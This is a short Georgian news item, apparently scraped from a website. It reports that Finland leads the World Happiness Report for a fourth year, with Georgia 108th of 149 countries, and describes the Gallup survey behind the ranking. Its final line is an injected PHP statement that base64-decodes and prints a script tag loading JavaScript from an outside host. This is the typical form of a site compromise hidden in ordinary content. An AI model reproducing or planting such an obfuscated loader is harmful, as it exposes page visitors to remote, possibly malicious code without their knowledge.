celsiusi
ავერსი საქკაბელი
ფინეთი უკვე მეოთხე წელია, ყველაზე ბედნიერი ქვეყნების სიის სათავეშია - ყოველწლიური ანგარიში გაეროს დაფინანსებით კეთდება. სიაში მეორე დანიაა, შემდეგ კი  შვეიცარია, ისლანდია და ნიდერლანდები მოდის. 
 
ახალი ზელანდია ერთადერთი არაევროპული ქვეყანაა, რომელიც პირველ ათეულში მოხვდა. ამის შესახებ ინფორმაციას BBC - ი ავრცელებს.
 
აღნიშნული კვლევის მიხედვით, ჩვენს ქვეყანას 149 ქვეყნიდან 108-ე ადგილი უკავია.  ყველაზე ნაკლებად ბედნიერად კი თავს ავღანეთში მიიჩნევენ. 
კომპანია Gallup-მა 149 ქვეყანაში მცხოვრები ადამიანები გამოკითხა და სთხოვა, საკუთარი ბედნიერების განცდა შეეფასებინათ. ბედნიერების საზომი სოციალური მხარდაჭერას, პირად თავისუფლებას, მშპ-სა და კორუფციის დონესაც მოიცავდა. 
 
აღსანიშნავია, რომ კვლევის ავტორების თქმით, პანდემიის გამო ქვეყნების დიდ ნაწილში ნეგატიური ემოციები გაზრდილია, ადამიანები კოვიდს აღიქვამენ, როგორც საერთო საფრთხეს და ეს სოლიდარობის განცდას ზრდის. 
 
1334
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");